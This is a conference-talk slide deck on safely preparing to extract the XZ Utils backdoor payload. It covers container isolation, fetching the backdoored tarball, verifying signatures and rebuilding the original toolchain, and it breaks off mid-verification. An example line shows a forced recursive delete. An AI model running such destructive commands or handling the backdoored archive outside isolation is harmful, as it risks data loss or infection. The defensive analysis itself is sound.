# How to extract the XZ backdoor malware payload
Step-by-step process to complete the first step of analysing the XZ backdoor.
Buo-ren Lin 0w0/
UbuCon Asia 2024 Talk
<small><https://hackmd.io/@brlin/xz-backdoor-payload-extraction-howto-en></small>
---
## <code>$ whoami</code>
* A member of the following communities:
+ [Ubuntu-TW](https://t.me/x_ubuntu_taiwan_community)
+ [L10N.TW](https://l10n.tw)
+ [MozTW](https://moztw.org)
+ [Snapcrafters](https://snapcrafters.org)
* A GNU/Linux user who is somewhat familiar with Bash, C, and Snap packaging.
* An ex-operations engineer with some information-security incident experience; here's my [résumé](https://brlin.me/resume).
---
## Recommended talk
![Screenshot](https://hackmd.io/_uploads/BkLzUiWnA.png)
---
## WTF is the XZ backdoor?
* A supply chain attack that threatened the security of Linux servers around the world.
* A mixture of social engineering, maliciously crafted software test data, and code obfuscation.
* Right before the attacker gained broad host access, a third party discovered it by accident and alerted the public; the FOSS community then swiftly mitigated the attack.
---
## Event timeline
* 2021.10: "Jia Tan" starts contributing benign patches to the XZ Utils project.
* 2022.04~2022.06: "Jigar Kumar" and "Dennis Ens" send several mails to the mailing list, pressuring the project maintainer to hand over maintainership to "Jia Tan".
* 2022.10: "Jia Tan" is given maintainer access to the XZ Utils project.
---
## Event timeline(cont.)
* 2023.06: "Hans Jansen" contributes an optimization patch that can be used by the backdoor code to override function calls.
* 2024.02: "Jia Tan" injects malicious binary code in the disguise of software test files to the XZ Utils source code repository.
---
## Event timeline(cont.)
* 2024.02: "Jia Tan" releases XZ Utils 5.6.0 and publishes a source release archive that contains a malicious build system file, which extracts the malicious code from the test data and injects it into the build.
* 2024.03: "Jia Tan" releases XZ Utils 5.6.1 with bug fixes for the backdoor, which had caused downstream Valgrind checks to fail.
* 2024.03: ["Hans Jansen" files a bug to Debian to pressure the downstream maintainer to import the 5.6.1 version of XZ Utils](https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708)
---
## Event timeline(cont.)
* 2024.03.28: ["Jia Tan" attempts to pressure the downstream Ubuntu maintainer to import the backdoored XZ Utils package to Ubuntu](https://bugs.launchpad.net/ubuntu/+source/xz-utils/+bug/2059417)
* 2024.03.28: [Andres Freund discovers the backdoor and alerts the related parties.](https://www.openwall.com/lists/oss-security/2024/03/29/4)
* 2024.03.28: [Debian rolls the XZ Utils package back to 5.4.5](https://tracker.debian.org/news/1515519/accepted-xz-utils-561really545-1-source-into-unstable/)
* 2024.03.28: [Arch Linux changes build recipe to avoid using the source release archive from the upstream.](https://gitlab.archlinux.org/archlinux/packaging/packages/xz/-/commit/881385757abdc39d3cfea1c3e34ec09f637424ad)
---
## Expectations
This talk will inform you:
* How to investigate potential malware on a Linux system in a safe manner.
* Generic FOSS software building process.
This talk will NOT inform you:
* How to reverse-engineer the malware payload.
---
## Prerequisites
* You need to have basic experience of operating the Linux text terminal.
* The host for the operation needs to have the Docker container runtime installed.
<!-- + Docker provides an isolated environment to avoid the situation where the malware may be accidentally executed. -->
+ {Other virtualization solutions|containers, virtual machines} may also work with slightly different operation details.
* The host for the operation needs to have Internet access.
---
## Bash indexed array syntax introduction
To make it easier to explain how the command options and arguments work, this talk stores them in Bash indexed arrays:
```bash
rm_opts=(
# Recursively remove sub-directory items.
--recursive
# Don't prompt on concerning items and conduct the operation without questioning whether it is sane to do so
--force
)
rm "${rm_opts[@]}" /not/your/root/*
```
```
$ echo rm "${rm_opts[@]}" /not/your/root/*
rm --recursive --force /not/your/root/*
```
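
Why an array rather than a plain string? The following is a minimal sketch, using a hypothetical `count_args` helper and made-up option values, of how the quoted `"${array[@]}"` expansion keeps every element as exactly one argument, even when the element contains spaces:

```bash
# Hypothetical helper: print how many arguments it received
count_args() {
echo "${#}"
}

demo_opts=(
# One option whose value contains spaces
--message "hello big world"
--force
)

# Quoted array expansion: every element stays one argument
array_count="$(count_args "${demo_opts[@]}")"

# Unquoted string expansion: the shell splits on whitespace
demo_opts_string='--message hello big world --force'
string_count="$(count_args ${demo_opts_string})"

echo "array: ${array_count}, string: ${string_count}"
```

The array form passes 3 arguments while the string form passes 5, which is why the rest of the commands in this talk use arrays.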
---
## Creating a working directory
This prevents you from accidentally using the malware later.
**DO NOT** place it in your Downloads folder.
```bash!
mkdir '/path/to/the/hosting/dir/CVE-2024-3094'
```
---
## Prepare the guest environment(container/VM) for security investigation
You don't really want to conduct a malware analysis using {the host environment|My Computer}, right?
---
### Fetch the Ubuntu 22.04 Docker image from the container registry
Download the latest Docker image in order to reduce the time required for applying security updates:
```bash
docker pull ubuntu:22.04
```
---
### Create the Docker container of the operation environment and acquire its interactive shell
```bash
docker_run_opts=(
--rm
--interactive --tty
--mount "type=bind,source=${PWD},destination=/project"
--env TZ=CST-8
--name cve-2024-3094
--hostname cve-2024-3094
)
docker run "${docker_run_opts[@]}" ubuntu:22.04
```
---
### Switch to the local Ubuntu archive mirror
To reduce the time required to download packages:
```bash
mirror=in.archive.ubuntu.com
sed_opts=(
--in-place=".orig"
--regexp-extended
--expression="s@//[^/]*/ubuntu/@//${mirror}/ubuntu/@"
)
sed "${sed_opts[@]}" /etc/apt/sources.list
apt update
```
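
If you would like to preview what the substitution does before touching the real file, here is a small sketch that applies the same expression to a throwaway copy. The two sample lines are assumptions about what a stock `sources.list` looks like, not a dump from the container:

```bash
# Work on a temporary file instead of /etc/apt/sources.list
sample_sources_list="$(mktemp)"
cat >"${sample_sources_list}" <<'EOF'
deb http://archive.ubuntu.com/ubuntu/ jammy main restricted
deb http://security.ubuntu.com/ubuntu/ jammy-security main restricted
EOF

mirror=in.archive.ubuntu.com
sed_opts=(
--regexp-extended
--expression="s@//[^/]*/ubuntu/@//${mirror}/ubuntu/@"
)
# Without --in-place, sed prints the result and leaves the file alone
rewritten="$(sed "${sed_opts[@]}" "${sample_sources_list}")"
echo "${rewritten}"
rm "${sample_sources_list}"
```

Note that the pattern matches any host name followed by `/ubuntu/`, so in this sample the `security.ubuntu.com` line is pointed at the mirror as well.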
---
### Upgrade the operating environment's software to the latest version
```bash
apt full-upgrade
```
This reduces the chance of the malware gaining privileges inside or outside the container through known security defects in the installed software.
---
## Compare the difference between the contaminated XZ Utils 5.6.1 software and the original
What changes are applied by the attacker in order to conduct this attack?
---
### Acquire the contaminated XZ Utils 5.6.1 software source release package and its PGP signature
The original download link from the GitHub project no longer works. However, you can retrieve a copy from [the page snapshots of the Wayback Machine](https://web.archive.org/web/*/https://github.com/tukaani-project/xz/releases/download/*):
* <https://web.archive.org/web/20240329215428%2a/https://github.com/tukaani-project/xz/releases/download/v5.6.1/xz-5.6.1.tar.bz2>
* <https://web.archive.org/web/20240329215430%2a/https://github.com/tukaani-project/xz/releases/download/v5.6.1/xz-5.6.1.tar.bz2.sig>
---
### Verify the contaminated XZ Utils source release package's authenticity
Although it is ironic that we need to do so lmao.
---
### Install the GnuPG utility that is used to verify the authenticity of the source release package
GnuPG is [Pretty Good Privacy(PGP)](https://en.wikipedia.org/wiki/Pretty_Good_Privacy)'s main open-source implementation.
```bash
apt install gnupg
```
---
### Acquire the PGP public key of the attacker
The original domain name of the XZ Utils official website is now invalid, but you can still recover the public key from the Wayback Machine page snapshot:
<https://web.archive.org/web/20240119212247/https://xz.tukaani.org/keys/jia_tan_pubkey.txt>
Simply save the file to your working directory and rename the file to "potential-evil-actor.pubkey".
---
### Import the attacker's PGP public key to your GnuPG keyring
```bash
gpg --import potential-evil-actor.pubkey
```
```txt!
gpg: key 59FCF207FEA7F445: 1 signature not checked due to a missing key
gpg: /root/.gnupg/trustdb.gpg: trustdb created
gpg: key 59FCF207FEA7F445: public key "Jia Tan <jiat0218@gmail.com>" imported
gpg: Total number processed: 1
gpg: imported: 1
gpg: no ultimately trusted keys found
```
---
### Verify the authenticity of the contaminated source package
```bash
gpg_opts=(
# Use the xz-5.6.1.tar.bz2.sig detached PGP signature
# and the signer's PGP public key to verify the
# authenticity of the xz-5.6.1.tar.bz2 file
--verify xz-5.6.1.tar.bz2.sig xz-5.6.1.tar.bz2
)
gpg "${gpg_opts[@]}"
```
```txt!
gpg: Signature made Sat Mar 9 08:22:45 2024 UTC
gpg: using RSA key 22D465F2B4C173803B20C6DE59FCF207FEA7F445
gpg: Good signature from "Jia Tan <jiat0218@gmail.com>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 22D4 65F2 B4C1 7380 3B20 C6DE 59FC F207 FEA7 F445
```
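
A "Good signature" only tells us that the file was signed by the key we imported, not that the key owner is trustworthy. As a small sanity check, the sketch below compares the key reported in the `using RSA key` line with the primary key fingerprint; both values are copied from the output above, and the variable names are only for illustration:

```bash
# Values copied from the gpg output above
signing_key='22D465F2B4C173803B20C6DE59FCF207FEA7F445'
primary_fingerprint='22D4 65F2 B4C1 7380 3B20 C6DE 59FC F207 FEA7 F445'

# Remove every space so both values share the same format
normalized_fingerprint="${primary_fingerprint// /}"

if test "${normalized_fingerprint}" = "${signing_key}"; then
echo 'The signature was made by the primary key.'
else
echo 'The signature was made by a different (sub)key.'
fi
```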
---
### Extract the contaminated 5.6.1 version of the XZ Utils source package
```bash
bzip_tarball_extraction_dependency_pkgs=(
# For extracting files compressed using the bzip2
# compression format
bzip2
# For extracting uncompressed tarballs
tar
)
apt install "${bzip_tarball_extraction_dependency_pkgs[@]}"
```
---
```bash
tar_opts=(
# Specify to let the tar command run in file extraction
# operation mode
--extract
# Specify the tarball to extract
--file xz-5.6.1.tar.bz2
)
tar "${tar_opts[@]}"
```
![image](https://hackmd.io/_uploads/HkCn5XcF0.png)
---
### Checkout the uncontaminated 5.6.1 version of XZ Utils's software source code
XZ Utils [uses Git to version control their source code](https://git.tukaani.org/?p=xz.git), so install the Git client first:
```bash
apt install git
```
---
```bash
git_clone_opts=(
# Only fetch a single level of the history to reduce clone time
--depth=1
# Only check out the revision that represents the 5.6.1 release
--branch v5.6.1
)
git clone "${git_clone_opts[@]}" \
https://git.tukaani.org/xz.git \
xz-git
```
![image](https://hackmd.io/_uploads/r1rgiQqF0.png)
---
### Compare the differences between the two version of XZ Utils
First install a utility that lists directory trees, so that the two listings can be compared:
```bash
apt install tree
```
---
```bash
diff_opts=(
--unified=0 # Use the unified diff format, without
) # showing the context lines
grep_opts=(
--extended-regexp # Use the Extended Regular Expression
# (ERE) syntax that is easier to write
--regexp='^(---|\+\+\+) ' # The regular expression
# pattern to match
--invert-match # Match lines that didn't match the regex
)
tree_opts=(
-a # Enumerate hidden files as well
-I '.git/' # Do not enumerate files in the Git database
)
# Bash Manual > Basic Shell Features > Shell Expansions
# > Process Substitution
diff "${diff_opts[@]}" \
<(tree "${tree_opts[@]}" xz-git) \
<(tree "${tree_opts[@]}" xz-5.6.1) \
| grep "${grep_opts[@]}" \
| less
```
---
```diff=
@@ -1 +1,3 @@
-xz-git
+xz-5.6.1
+├── ABOUT-NLS
+├── aclocal.m4
...stripped...
@@ -19 +29,2 @@
-├── .codespellrc
+├── config.h.in
+├── configure
...stripped...
@@ -550 +758 @@
-38 directories, 510 files
+48 directories, 708 files
```
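
To try the process substitution technique without the real source trees, here is a self-contained sketch. It builds two tiny throwaway trees with hypothetical file names and uses `find` plus `sort` in place of `tree`, so that nothing needs to be installed:

```bash
# Build two small throwaway trees (hypothetical file names)
demo_dir="$(mktemp -d)"
mkdir -p "${demo_dir}/repo/src" "${demo_dir}/release/src"
touch "${demo_dir}/repo/src/main.c" "${demo_dir}/repo/configure.ac"
touch "${demo_dir}/release/src/main.c" "${demo_dir}/release/configure.ac"
# Only the release tree ships the pre-generated configure script
touch "${demo_dir}/release/configure"

# List a tree relative to its own root, in a stable order
list_tree() {
(cd "${1}" && find . | LC_ALL=C sort)
}

# Each <(...) is replaced by a file name that diff can read from
listing_diff="$(
diff --unified=0 \
<(list_tree "${demo_dir}/repo") \
<(list_tree "${demo_dir}/release") \
| grep --extended-regexp --invert-match '^(---|\+\+\+) '
)"
echo "${listing_diff}"
rm -r "${demo_dir}"
```

The output contains a `+./configure` line: the file exists only in the "release" tree, just like the extra files in the real comparison above.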
---
## The differences between the source code from the release package and the one checked out from the repo
The released source package may have the following pre-built assets from the project maintainer:
* A ready-to-use software build configuration program<!-- (because the user environment may not have the version of the software required for building)-->
* Software usage/development documentation
---
## The differences between the source code from the release package and the one checked out from the repo(cont.)
Compared to the source code checked out from the repository, the released source package may also lack:
* Configuration files that are only used in software development
---
### Review the installation documentation of the XZ Utils software
We need to determine:
* The software build system the software uses.
* The software's build dependencies
* Available source build configuration options and their default values.
* Other special things to take note of.
---
Install a plaintext data pager that supports PageUp/PageDown browsing operations:
```bash
apt install less
```
:::danger
**Warning:** [DO NOT use the `cat` utility to read documents](https://twitter.com/0xAsm0d3us/status/1774534241084445020)
:::
---
![image](https://hackmd.io/_uploads/HkpLuxntR.png)
---
![image](https://hackmd.io/_uploads/rJlPYx3F0.png)
---
### Review the installation documentation of the XZ Utils software
```bash
less xz-git/INSTALL
```
Common operations
* `↑`/`↓`: Move up/down a line
* `PageUp`/`PageDn`: Move to the previous/next page
* `h`: Show the help screen
* `q`: Leave the pager program
---
![image](https://hackmd.io/_uploads/rkR-rzqKA.png)
xz-git/INSTALL > Preface
---
![image](https://hackmd.io/_uploads/Sy6ESM9tA.png)
xz-git/INSTALL.generic > Basic Installation
---
![image](https://hackmd.io/_uploads/r1LuBf9YA.png)
xz-git/INSTALL.generic > Basic Installation
---
![image](https://hackmd.io/_uploads/ry7oUGctC.png)
xz-git/INSTALL.generic > Basic Installation
---
The XZ Utils software uses the [GNU build system](https://www.gnu.org/software/automake/manual/html_node/GNU-Build-System.html) to build itself. It comprises, among others, the following software components:
* [GNU Autoconf](https://www.gnu.org/software/autoconf/)
* [GNU Automake](https://www.gnu.org/software/automake/)
* [GNU Libtool](https://www.gnu.org/software/libtool/)
---
### Verify the software build system component versions that were used to build the 5.6.1 version of the XZ Utils source release package
---
Verify the GNU Autoconf version that is used by the attacker:
```bash
head_opts=(
# Only show the first three lines of the file
--lines=3
)
head "${head_opts[@]}" xz-5.6.1/configure
```
```bash
#! /bin/sh
# Guess values for system-dependent variables and create Makefiles.
# Generated by GNU Autoconf 2.72 for XZ Utils 5.6.1.
```
GNU Autoconf==2.72
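
Reading the header by eye works fine for a handful of files. If you prefer to extract the version number programmatically, the following sketch shows one way with `sed`. It runs against a temporary file holding the three header lines shown above; the variable names are assumptions made for this example:

```bash
# Sample header, copied from the `head` output above
sample_configure="$(mktemp)"
cat >"${sample_configure}" <<'EOF'
#! /bin/sh
# Guess values for system-dependent variables and create Makefiles.
# Generated by GNU Autoconf 2.72 for XZ Utils 5.6.1.
EOF

sed_opts=(
# Don't print lines unless explicitly requested
--quiet
--regexp-extended
# Print only the version number captured by the group
--expression='s/^# Generated by GNU Autoconf ([0-9.]+) for .*$/\1/p'
)
autoconf_version="$(sed "${sed_opts[@]}" "${sample_configure}")"
echo "GNU Autoconf==${autoconf_version}"
rm "${sample_configure}"
```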
---
```bash
head_opts=(
# Only show the first three lines of the file
--lines=3
)
head "${head_opts[@]}" xz-5.6.1/Makefile.in
```
```output
# Makefile.in generated by automake 1.16.5 from Makefile.am.
# @configure_input@
```
GNU Automake==1.16.5
---
```bash
head_opts=(
# Only show the first five lines of the file
--lines=5
)
head "${head_opts[@]}" xz-5.6.1/build-aux/ltmain.sh
```
```output
#! /usr/bin/env sh
## DO NOT EDIT - This file generated from ./build-aux/ltmain.in
## by inline-source v2019-02-19.15
# libtool (GNU libtool) 2.4.7.4-1ec8f-dirty
```
GNU libtool~=2.4.7.4-1ec8f-dirty?
---
![image](https://hackmd.io/_uploads/BknMnMcF0.png)
GNU libtool==1ec8f revision + {unknown changes|-dirty}
---
XZ Utils also appears to use GNU Gettext:
```m4
dnl Support for _REQUIRE_VERSION was added in gettext 0.19.6. If both
dnl _REQUIRE_VERSION and _VERSION are present, the _VERSION is ignored.
dnl We use both for compatibility with other programs in the Autotools family.
echo
echo "Initializing gettext:"
AM_GNU_GETTEXT_REQUIRE_VERSION([0.19.6])
AM_GNU_GETTEXT_VERSION([0.19.6])
AM_GNU_GETTEXT([external])
```
xz-git/configure.ac
---
```bash
head_opts=(
# Only show the first line of the file
--lines=1
)
head "${head_opts[@]}" xz-5.6.1/m4/gettext.m4
```
```txt
# gettext.m4 serial 78 (gettext-0.22.4)
```
GNU Gettext==0.22.4
---
### Install the dependencies of building XZ Utils's {build configuration program|./configure}: GNU Autoconf 2.72
![download](https://hackmd.io/_uploads/SyKVyuiKR.png)
![list](https://hackmd.io/_uploads/S1Z1edsFA.png)
---
```bash
gpg_opts=(
# Use the autoconf-2.72.tar.xz.sig detached PGP
# signature and the signer's PGP public key to verify
# the authenticity of the autoconf-2.72.tar.xz file
--verify autoconf-2.72.tar.xz.sig autoconf-2.72.tar.xz
)
gpg "${gpg_opts[@]}"
```
```txt
gpg: Signature made Fri Dec 22 19:13:21 2023 UTC
gpg: using RSA key 82F854F3CE73174B8B63174091FCC32B6769AA64
gpg: Can't check signature: No public key
```
---
```bash
gpg_opts=(
# Specify the PGP keyserver to request the signer's
# public key(the default `hkps://keys.openpgp.org`
# keyserver seems to be flaky)
--keyserver keyserver.ubuntu.com
# Retrieve and import the PGP public key of the
# specified KeyID into the GnuPG keyring
--receive-keys 82F854F3CE73174B8B63174091FCC32B6769AA64
)
gpg "${gpg_opts[@]}"
```
```txt!
gpg: key 91FCC32B6769AA64: public key "Zack Weinberg <zackw@panix.com>" imported
gpg: Total number processed: 1
gpg: imported: 1
```
---
```bash
gpg_opts=(
# Use the autoconf-2.72.tar.xz.sig detached PGP
# signature and the signer's PGP public key to verify
# the authenticity of the autoconf-2.72.tar.xz file
--verify autoconf-2.72.tar.xz.sig autoconf-2.72.tar.xz
)
gpg "${gpg_opts[@]}"
```
```txt!
gpg: Signature made Sat Dec 23 03:13:21 2023 CST
gpg: using RSA key 82F854F3CE73174B8B63174091FCC32B6769AA64
gpg: Good signature from "Zack Weinberg <zackw@panix.com>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 82F8 54F3 CE73 174B 8B63 1740 91FC C32B 6769 AA64
```
---
Install the dependency software to extract XZ-compressed tarballs:
```bash
apt install xz-utils
```
Extract the source archive:
```bash
tar_opts=(
# Specify to let the tar command run in file extraction
# operation mode
--extract
# Specify the tarball to extract
--file autoconf-2.72.tar.xz
)
tar "${tar_opts[@]}"
```
---
Switch the working directory to the root directory of the GNU Autoconf source tree:
```bash!
cd autoconf-2.72
```
Review the help message output of the build configuration program:
```bash!
./configure --help
```
Run the software build configuration program, fixing each reported error and rerunning it until it succeeds:
```bash
./configure
```
---
```txt!
configure: error: no acceptable m4 could be found in $PATH.
GNU M4 1.4.8 or later is required; 1.4.16 or newer is recommended.
GNU M4 1.4.15 uses a buggy replacement strstr on some systems.
Glibc 2.9 - 2.12 and GNU M4 1.4.11 - 1.4.15 have another strstr bug.
```
Solution:
```bash
apt install m4
```
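
Instead of discovering missing tools one failed run at a time, you can check for them up front. Below is a sketch with a hypothetical `list_missing_commands` helper; the command list is only a sample of tools that this walkthrough ends up installing, not a complete dependency list:

```bash
# Hypothetical helper: print every command in the argument list
# that cannot be found in the command search path
list_missing_commands() {
local command_name
for command_name in "${@}"; do
if ! command -v "${command_name}" >/dev/null 2>&1; then
echo "${command_name}"
fi
done
}

# A sample of commands that this walkthrough needs sooner or later
required_commands=(m4 make gcc)
missing_commands="$(list_missing_commands "${required_commands[@]}")"

if test -n "${missing_commands}"; then
# Intentionally unquoted so the names are printed on one line
echo "Missing commands:" ${missing_commands}
else
echo 'All listed commands are available.'
fi
```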
---
```txt
configure: creating ./config.status
config.status: creating tests/atlocal
config.status: creating Makefile
config.status: creating lib/version.m4
config.status: executing tests/atconfig commands
You are about to use an experimental version of Autoconf. Be sure to
read the relevant mailing lists, most importantly <autoconf@gnu.org>.
Below you will find information on the status of this version of Autoconf.
...stripped...
```
```bash
/project/autoconf-2.72# echo "${?}"
0
```
```bash
/project/autoconf-2.72# head --lines=2 Makefile
# Makefile.in generated by automake 1.16.5 from Makefile.am.
# Makefile. Generated from Makefile.in by configure.
```
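
The `echo "${?}"` check prints the exit status of the previous command, where `0` means success. When chaining several build steps, the same status can be used to stop at the first failure. A minimal sketch, with a hypothetical `run_step` helper and with `true`/`false` standing in for the real `./configure` and `make` commands:

```bash
# Hypothetical helper: run a command and report a non-zero exit status
run_step() {
"${@}"
local exit_status="${?}"
if test "${exit_status}" -ne 0; then
echo "FAILED (${exit_status}): ${*}" >&2
fi
return "${exit_status}"
}

# `true` and `false` stand in for ./configure, make, and so on;
# the third step never runs because the second one fails
if run_step true && run_step false && run_step true; then
pipeline_result='ok'
else
pipeline_result='failed'
fi
echo "${pipeline_result}"
```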
---
Install GNU Make:
```bash
apt install make
```
Start building the software:
```bash
# Query the supported thread count of the system's CPU
number_of_cpu_threads="$(nproc)"
make_opts=(
# Reduce build time by running multiple build
# processes at the same time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
---
```txt
make[1]: Entering directory '/project/autoconf-2.72'
...stripped...
mv -f tests/autoheader.tmp tests/autoheader
mv -f tests/autoconf.tmp tests/autoconf
mv -f tests/autom4te.tmp tests/autom4te
mv -f tests/autoscan.tmp tests/autoscan
mv -f tests/autoreconf.tmp tests/autoreconf
mv -f tests/autoupdate.tmp tests/autoupdate
mv -f tests/ifnames.tmp tests/ifnames
make[1]: Leaving directory '/project/autoconf-2.72'
```
```bash
/project/autoconf-2.72# echo "${?}"
0
```
---
Install the built software:
```bash!
/project/autoconf-2.72# make install
```
```txt!
make install-am
make[1]: Entering directory '/project/autoconf-2.72'
...stripped...
make[3]: Leaving directory '/project/autoconf-2.72'
make[2]: Leaving directory '/project/autoconf-2.72'
make[1]: Leaving directory '/project/autoconf-2.72'
```
```bash
/project/autoconf-2.72# echo "${?}"
0
```
---
Verify whether the software is successfully installed:
```txt
/project/autoconf-2.72# autoconf --version
autoconf (GNU Autoconf) 2.72
Copyright (C) 2023 Free Software Foundation, Inc.
License GPLv3+/Autoconf: GNU GPL version 3 or later
<https://gnu.org/licenses/gpl.html>, <https://gnu.org/licenses/exceptions.html>
...stripped...
```
Switch the working directory back:
```bash
cd /project
```
---
### Install the dependencies of building XZ Utils's {build configuration program|./configure}: GNU Automake 1.16.5
![downloads](https://hackmd.io/_uploads/HJh2_S3F0.png)
![files](https://hackmd.io/_uploads/HymL_S2KR.png)
---
Query the signer's PGP public key KeyID:
```bash
gpg_opts=(
# Use the automake-1.16.5.tar.xz.sig detached PGP signature
# and the signer's PGP public key to verify the
# authenticity of the automake-1.16.5.tar.xz file
--verify automake-1.16.5.tar.xz.sig automake-1.16.5.tar.xz
)
gpg "${gpg_opts[@]}"
```
```txt!
gpg: Signature made Mon Oct 4 11:23:30 2021 CST
gpg: using RSA key 155D3FC500C834486D1EEA677FD9FCCB000BEEEE
gpg: Can't check signature: No public key
```
---
Import the signer's PGP public key to your GnuPG keyring:
```bash
gpg_opts=(
# Specify the PGP keyserver to request the signer's
# public key(the default `hkps://keys.openpgp.org`
# keyserver seems to be flaky)
--keyserver keyserver.ubuntu.com
# Retrieve and import the PGP public key of the
# specified KeyID into the GnuPG keyring
--receive-keys 155D3FC500C834486D1EEA677FD9FCCB000BEEEE
)
gpg "${gpg_opts[@]}"
```
```txt!
gpg: key 7FD9FCCB000BEEEE: public key "Jim Meyering <jim@meyering.net>" imported
gpg: Total number processed: 1
gpg: imported: 1
```
---
Verify the authenticity of the GNU Automake source package:
```bash
gpg_opts=(
# Use the automake-1.16.5.tar.xz.sig detached PGP signature
# and the signer's PGP public key to verify the
# authenticity of the automake-1.16.5.tar.xz file
--verify automake-1.16.5.tar.xz.sig automake-1.16.5.tar.xz
)
gpg "${gpg_opts[@]}"
```
```txt
gpg: Signature made Mon Oct 4 03:23:30 2021 UTC
gpg: using RSA key 155D3FC500C834486D1EEA677FD9FCCB000BEEEE
gpg: Good signature from "Jim Meyering <jim@meyering.net>" [unknown]
gpg: aka "Jim Meyering <meyering@fb.com>" [unknown]
gpg: aka "Jim Meyering <meyering@gnu.org>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
Primary key fingerprint: 155D 3FC5 00C8 3448 6D1E EA67 7FD9 FCCB 000B EEEE
```
---
Extract the source archive:
```bash
tar_opts=(
# Specify to let the tar command run in file extraction
# operation mode
--extract
# Specify the tarball to extract
--file automake-1.16.5.tar.xz
)
tar "${tar_opts[@]}"
```
Switch the working directory to the root directory of the GNU Automake source tree:
```bash!
cd automake-1.16.5
```
---
Configure software build:
```bash
./configure
```
```txt
/project/automake-1.16.5# echo "${?}"
0
```
Build the software:
```bash
# Query the supported thread count of the system's CPU
number_of_cpu_threads="$(nproc)"
make_opts=(
# Reduce build time by running multiple build
# processes at the same time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
```txt
/project/automake-1.16.5# echo "${?}"
0
```
---
Install built software:
```bash!
/project/automake-1.16.5# make install
```
Verify installation:
```bash!
/project/automake-1.16.5# automake --version
```
```txt!
automake (GNU automake) 1.16.5
Copyright (C) 2021 Free Software Foundation, Inc.
License GPLv2+: GNU GPL version 2 or later <https://gnu.org/licenses/gpl-2.0.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Written by Tom Tromey <tromey@redhat.com>
and Alexandre Duret-Lutz <adl@gnu.org>.
```
Switch the working directory back:
```bash
cd /project
```
---
### Install the 1ec8f revision of the GNU libtool software, which is a dependency for building the XZ Utils {software build configuration program|./configure}
![image](https://hackmd.io/_uploads/BJbyJI3tA.png)
---
```bash
git_clone_opts=(
# Only fetch the recent 200 commits to reduce the time
# required for cloning the repository
--depth=200
)
git clone "${git_clone_opts[@]}" \
https://git.savannah.gnu.org/git/libtool.git \
libtool-git
cd libtool-git
git checkout 1ec8fa2
```
```txt!
Cloning into 'libtool-git'...
...stripped...
Note: switching to '1ec8fa2'.
You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by switching back to a branch.
```
---
Build the software build configuration program:
```bash
test -f configure || ./bootstrap
```
```txt!
bootstrap: error: Prerequisite 'help2man' not found. Please install it, or
bootstrap: 'export HELP2MAN=/path/to/help2man'.
bootstrap: error: Prerequisite 'makeinfo' not found. Please install it, or
bootstrap: 'export MAKEINFO=/path/to/makeinfo'.
```
```bash
apt install help2man texinfo
```
```bash
test -f configure || ./bootstrap
```
```out!
bootstrap: Done. Now you can run './configure'.
```
---
Configure software build:
```bash
./configure
```
```txt!
configure: error: no acceptable C compiler found in $PATH
```
```bash
apt install gcc
```
```bash
./configure
```
```txt!
...stripped...
config.status: executing tests/atconfig commands
config.status: executing depfiles commands
config.status: executing libtool commands
```
```bash
/project/libtool-git# echo "${?}"
0
```
---
Build the software:
```bash
number_of_cpu_threads="$(nproc)"
make_opts=(
# Reduce build time by running multiple build
# processes at the same time
--jobs="${number_of_cpu_threads}"
)
make "${make_opts[@]}"
```
```txt!
GEN libtoolize
make all-recursive
make[1]: Entering directory '/project/libtool-git'
...stripped...
make[1]: Leaving directory '/project/libtool-git'
```
```bash
/project/libtool-git# echo "${?}"
0
```
---
Install built software:
```bash
make install
```
```txt!
make[1]: Entering directory '/project/libtool-git'
Making install in .
...stripped...
make[1]: Leaving directory '/project/libtool-git'
```
```bash
/project/libtool-git# echo "${?}"
0
```
---
Verify installation:
```bash
libtool --version
```
```txt!
libtool (GNU libtool) 2.4.7.4-1ec8
Written by Gordon Matzigkeit, 1996
Copyright (C) 2014 Free Software Foundation, Inc.
```
Switch the working directory back to the project directory:
```bash
cd /project
```
---
### Install the 0.22.4 version of the GNU Gettext software, which is a dependency for building the XZ Utils {software build configuration program|./configure}
![image](https://hackmd.io/_uploads/Sy4fLUhKR.png)
---
Download the source release package and its corresponding PGP signature file:
![image](https://hackmd.io/_uploads/HyXOIUnFC.png)
<https://ftp.gnu.org/pub/gnu/gettext/>
---
Query the signer's PGP public key KeyID:
```bash
gpg_opts=(
# Use the gettext-0.22.4.tar.lz.sig detached PGP signature
# and the signer's PGP public key to verify the
# authenticity of the gettext-0.22.4.tar.lz file
--verify gettext-0.22.4.tar.lz.sig gettext-0.22.4.tar.lz
)
gpg "${gpg_opts[@]}"
```
```out!
gpg: Signature made Mon Nov 20 04:56:11 2023 CST
gpg: using RSA key 9001B85AF9E1B83DF1BDA942F5BE8B267C6A406D
gpg: Can't check signature: No public key
```
---
Import the signer's PGP public key to your GnuPG keyring:
```bash
gpg_opts=(
# Specify the PGP keyserver to request the signer's
# public key(the default `hkps://keys.openpgp.org`
# keyserver seems to be flaky)
--keyserver keyserver.ubuntu.com
# Retrieve and import the PGP public key of the
# specified KeyID into the GnuPG keyring
--receive-keys 9001B85AF9E1B83DF1BDA942F5BE8B267C6A406D
)
gpg "${gpg_opts[@]}"
```
```txt!
gpg: key F5BE8B267C6A406D: public key "Bruno Haible (Open Source Development) <bruno@clisp.org>" imported
gpg: Total number processed: 1
gpg: imported: 1
```
---
Verify the authenticity of the Gettext release package:
```bash
gpg_opts=(
# Use the gettext-0.22.4.tar.lz.sig detached PGP
# signature and the signer's PGP public key to verify
# the authenticity of the gettext-0.22.4.tar.lz file
--verify gettext-0.22.4.tar.lz.sig gettext-0.22.4.tar.lz
)
gpg "${gpg_opts[@]}"
```
```txt!
gpg: Signature made Mon Nov 20 04:56:11 2023 CST
gpg: using RSA key 9001B85AF9E1B83DF1BDA942F5BE8B267C6A406D
gpg: Good signature from "Bruno Haible (Open Source Development) <bruno@clisp.org>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg: There is no indication that the signature belongs to the owner.
